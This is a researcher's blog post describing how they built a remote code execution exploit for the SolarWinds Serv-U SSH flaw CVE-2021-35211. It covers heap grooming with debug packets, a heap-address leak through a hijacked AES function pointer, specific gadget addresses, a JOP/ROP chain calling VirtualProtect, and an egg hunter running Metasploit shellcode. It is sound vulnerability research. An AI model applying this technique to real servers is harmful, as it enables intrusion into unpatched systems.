23 September 2021
In my last post, I provided an analysis of the vulnerability in Solarwinds Serv-U, CVE-2021-35211. Picking up from where I left off, this post will discuss my approach to achieving (a super unstable) RCE in Serv-U on Windows 10. As usual, for those who are here for the exploit, it can be found here.
As we now know, by sending packets in an invalid order, we can trigger Serv-U to dereference and call function pointer dat->block
from an uninitialised heap buffer here. How then can we control the value of the function pointer?
From the source here, we see that the function pointer is dereferenced from the structure EVP_AES_KEY. As dat->block
compiles to offset 0xf8
in this structure and stream is 8 bytes, I deduced that the structure has a size of 0xf8 + 8 (stream) + 8 (block) = 0x108
bytes.
typedef struct {
union {
OSSL_UNION_ALIGN;
AES_KEY ks;
} ks;
block128_f block; // +0x0f8
union {
cbc128_f cbc;
ctr128_f ctr;
} stream; // +0x100
} EVP_AES_KEY; // +0x108
On Windows 10, blocks of this size will be allocated from the Low-Fragmentation Heap (LFH). To my knowledge, the LFH works by allocating a large chunk of memory called a subsegment and splitting it into identically sized blocks. To service a request, it returns a randomly selected unused block from the subsegment. When a subsegment is exhausted, a new one is allocated and the process repeats again.
Figure 1. Windows 10 LFH
Theoretically, it is possible for me to make enough allocations to exhaust the current subsegment, then exhaust the new subsegment and subsequently free all but one block of the new subsegment, which would ensure the next block that I allocate will always contain content I control.
Figure 2. Theoretical manipulation of LFH
However, due to the lack of information on the remaining space of the current subsegment as well as a bit of laziness, I decided to stick to the approach by Microsoft.
By allocating a couple user blocks and freeing them, there was a good chance that the next allocation will return one of the previous freed blocks. For the allocation and freeing, I simply sent packets with SSH2_MSG_DEBUG
with size 0x108
. The packets are basically no-ops, but a buffer of size 0x108
will still have to be allocated to hold the data within it, allowing us to allocate user blocks.
Figure 3. Packet to allocate block
Now, I can control the function pointer. What should I set it to then?
With some incredible luck, the Serv-U DLL itself didn’t have ASLR, which meant I can jump to any location in it without an information leak. Following Microsoft’s approach, I decided to jump to 0x1800E19EC
, which consists of the following instructions:
loc_1800E19EC: mov rdx, [rbx+58h]
loc_1800E19F0: mov r9d, esi
loc_1800E19F3: mov rcx, [rbx+38h]
loc_1800E19F7: mov r8, rbp
loc_1800E19FA: call qword ptr [rbx+10h]
As rbx
happened to be the base of the heap buffer, this meant that I could control both rcx
and rdx
, or the first 2 parameters. However, I felt that this primitive was still pretty limiting without an information leak. I could probably write to somewhere in the Serv-U.dll’s memory space and then use it as a parameter, but that required more analysis.
Hence, I decided to take a closer look at the context of the vulnerability. dat->block
is called from CRYPTO_ctr128_encrypt
, a function which does AES CTR encryption. Here’s a diagram of how this mode of AES encryption works.
Figure 4. AES CTR diagram
In the diagram above, dat->block
is the AES block cipher function which acts as a pseudorandom function (PRF), providing a stream of pseudorandom bytes to XOR with the plaintext stream. In the code for CRYPTO_ctr128_encrypt, we see that dat->block
is called the following way:
while (len >= 16) {
(*block) (ivec, ecount_buf, key); // block is dat->block, key is &dat->ks
ctr128_inc_aligned(ivec);
for (n = 0; n < 16; n += sizeof(size_t))
*(size_t_aX *)(out + n) =
*(size_t_aX *)(in + n)
^ *(size_t_aX *)(ecount_buf + n);
len -= 16;
out += 16;
in += 16;
n = 0;
}
As the input plaintext is XORed with ecount_buf
after calling the block function, it is easy to infer that ecount_buf
holds the output bytes for the block function. Meanwhile, key
comes from &dat->ks
here, and happens to be pointing to bottom of our EVP_AES_KEY
structure. Knowing these, I replaced the block function with the following gadget:
loc_18004E170: mov [rdx], r8
loc_18004E173: mov rax, rdx
loc_18004E176: retn
By moving the third argument (r8
) into the memory location of the second argument (rdx
), I essentially did *(void**)ecount_buf = key
, which changes the normal AES CTR procedure to this:
Figure 5. “AES CTR” diagram
The plaintext to encrypt was the server’s response packet and its first 8 bytes never changes. I simply had to XOR the known plaintext with the first 8 data bytes of the “encrypted” packet to leak the pointer to the key, which was the heap buffer location.
Now equipped with the heap leak, I made a second connection to the server and repeated the same attack, while keeping the previous connection open. Now, I have RIP control as well as a heap leak. At this stage, it was probably possible to do a single call to run a command of my choosing. However, I want remote code execution, so I decided to dig a little deeper.
Since I did not have stack control at this stage, I decided to instead make use of jump oriented programming (JOP) instead of ROP to kickstart the attack. The following is the setup:
Figure 6. JOP chain
With this chain of 4 gadgets, I can now pivot the stack to the heap buffer which I controlled. For my ROP chain, the general idea was to use VirtualProtect to change a heap buffer containing shellcode to rwx, and then jump to it. The Serv-U DLL already imports GetProcAddress
and LoadLibraryA
, so the ROP chain would have to achieve the same effect of following (pseudo)code:
kernel32 = LoadLibraryA("kernel32.dll");
virtualprotect = GetProcAddress(kernel32, "VirtualProtect");
(virtualprotect)(buffer_with_shellcode, // lpAddress
0x100, // dwSize
0x40, // flNewProtect
random_writeable_addr);// lpflOldProtect
The ROP chain was quite complicated so I would not be going through how it works in this post, but for those who are interested, feel free to contact me.
By now, this should have been the point where I can pop calc with my shellcode and call it a day. However, I soon came to realise that the fixed size of ~0x100 of the heap buffer holding my shellcode became a limiting factor. For Metasploit, even a basic windows/x64/exec
shellcode was at least 200+ bytes. To resolve the issue, I decided to make use of an age-old technique, the egg hunter.
On advice of my friend, I referenced code here and wrote a 200+ bytes shellcode that functioned similarly and looked for the egg 0x1337beef
.
All that was left was to send a SSH2_MSG_DEBUG
packet of arbitrary size containing the egg and shellcode. For my PoC video, I had to turn off the setting for Serv-U to run as a service, as services did not have GUIs. From there, I used a Metasploit windows/x64/exec shellcode
with CMD set to calc.exe (EXITFUNC
as thread) and popped calc.
Figure 7. Win
Till now, I haven’t really mentioned the reliability of my exploit. Just to make it clear, this exploit is extremely unstable, namely for these reasons:
If someone is determined enough, these problems can definitely be eliminated.
This concludes my two-month journey of exploring Serv-U and successfully exploiting a rather straightforward n-day vulnerability. Hopefully, in the future, I can work on finding some bugs of my own. :)